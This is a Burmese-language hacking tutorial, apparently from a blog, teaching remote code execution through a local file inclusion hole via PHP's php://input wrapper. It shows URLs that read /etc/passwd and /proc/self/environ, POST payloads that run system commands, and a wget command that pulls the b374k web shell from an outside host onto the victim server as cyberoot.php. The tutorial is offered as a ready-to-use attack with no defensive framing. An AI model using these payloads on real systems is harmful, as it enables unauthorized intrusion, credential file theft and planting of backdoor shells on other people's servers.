lfi-exploitation-via-phpinput

မလာဂါပင္ပါ
ဒီေန႔သင္မယ္႔သင္ခန္းစာေလးက လူသိပ္မသိေသးဘူးထင္ရတဲ႔ lfi exploitation ေတြထဲ႔က သာမန္ဟက္ကာေတြလက္ေရွာ႔သြားတတ္တဲ႔အဆင္႔ပါ

နားမလည္ဘူးဆိုရင္ေတာ႔ဆက္လုပ္ဖို႔မသိတဲ႔ သူေတြအတြက္ သိသေလာက္ေလး share ေပးလိုက္တာပါ
သံုးျပမယ္႔ နည္းလမ္းကေတာ႔ "php://input" ပဲ႔ျဖစ္ပါတယ္ စလိုက္ရေအာင္

ကၽြန္္ေတာ္ target ထားတဲ႔ website ကို http://www.victim.com ကိုထားလိုက္မယ္ဗ်ာ

နမူနာ

http://www.victim.com/index.php?page= 

အဲလို page မွာကၽြန္ေတာ္တို႔ include error ေတြကိုရွာနိုင္ပါတယ္

ပထမဆံုး /etc/passwd ဆိုတဲ႔ command ေလးနဲ႔စမ္းရေအာင္ ဒီေတာ႔ ေအာက္ကလိုျဖစ္သြားပါမယ္

http://www.victim.com/index.php?page=/etc/passwd

တစ္ကယ္လို႔ vul ျဖစ္တယ္ဆိုရင္ေတာ႔ ေအာက္ကပံုေလးလိုျဖစ္သြားမွာေပါ႔

ဟုတ္ပါတယ္ ပထမအဆင္႔ေတာ႔ဟက္ကာလို႔ေျပာေနတဲ႔သူတိုင္းသိမွာပါ လြယ္လြယ္ေလး
ေနာက္ထပ္ဆက္ဆြဲၾကည္႔မယ္

/proc/self/environ
/proc/self/fd

ဒီေတာ႔ full address ကဒီလိုျဖစ္သြားမွာပါ
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd

ပံုမွန္ဆိုရင္ အဲဒီအဆင္႔မွာ  error တက္ရင္ပံုမွန္ အတိုင္း expolit ဆက္လုပ္လို႔ရပါတယ္
ဒါေပမယ္႔ ဒီ အဆင္႔မွာ error မတက္ဘူးဆိုရင္ေကာ ဘာဆက္လုပ္မလဲ? ကၽြန္ေတာ္လည္းအရင္တုန္းက အဲဒီအဆင္မွာ႔ အျမဲတမ္း stop ျဖစ္တြားတယ္

အခုမွနည္းနည္းေလးသိတြားတာ  ဒိေတာ႔ ကၽြန္ေတာ္က null-bye ဆိုတဲ႔ နည္းလမ္းသံုးျပီး url ရဲ႕အဆံုးမွာ ထပ္ထည္႔ျပီးကလိရေအာင္

ဒီနည္းကိုလုပ္မွာဆိုေတာ႔ ကၽြန္ေတာ္တို႔မွာ hackbar သို႔မဟုတ္ Live HTTP headers တစ္ခုခုလိုပါတယ္
ဘာလို႔လဲဆိုေတာ႔ commond line က php://input လုပ္မယ္႔နည္းလမ္းက post method ကိုသံုးရလို႔ပါ
အခုျပမယ္႔ သင္ခန္းစာမွာေတာ႔ Hackbar ကိုအသံုးျပဳထားပါတယ္

ကၽြန္ေတာ္နည္းလမ္းေလးကိုစလိုက္ရေအာင္ ေအာက္က code ကို hackbar ထဲမွာ ရိုက္ထည္႔ပါ
http://www.site.com/index.php?page=php://input

ျပီးေတာ႔ ဒီ code ကိုေတာ႔ post ဆိုတဲ႔ ေအာက္က အကြက္မွာရိုက္ထည္႔ပါ
<? system('uname -a'); ?>

အျခားသံုးလို႔ရတဲ႔ command

List directories အတြက္ဆိုရင္
<? system('ls'); ?>

Identification အတြက္ဆိုရင္
<? system('id'); ?>

format ကိုေျပာင္းခ်င္တယ္ဆိုရင္
<? system('mv cyberootsh3ll.txt cyberootsh3ll.php'); ?>

ျပီးေတာ႔ကၽြန္ေတာ္တို႔အသံုးျပဳမယ္႔ shell ကို server တစ္ခုခုေပၚကိုတင္ထားရင္လည္းယူသံုးလို႔ရပါတယ္
မရွိဘူးဆိုရင္ေတာ႔အဆင္သင္႔တင္ထားတဲ႔ sh3lll.org ကေနသြားယူလိုက္ပါ ကၽြန္ေတာ္ကေတာ႔ b374k shell ကိုအသံုးျပဳပါမယ္

http://www.sh3ll.org/b374k.txt?
ဒါျပီးရင္ေတာ႔ victim site ေပၚကို shell တင္ဖို႔အတြက္ wget command ကိုသံုးပါမယ္

<? system('wget http://www.sh3ll.org/b374k.txt -O cyberoot.php'); ?>

Hackbar မွာ execute လုပ္လိုက္ပါ ျပီးေတာ႔ဒါကိုသြားၾကည္႔ပါဦး

http://www.victim.com/cyberoot.php

Thanks for Reading..
Written by cyberoot.blogspot.com
Life is too bad, i like the challenge :)
I lost my mine ,Regard Hacker625
Credit:my Bro zerofreak  Team Intra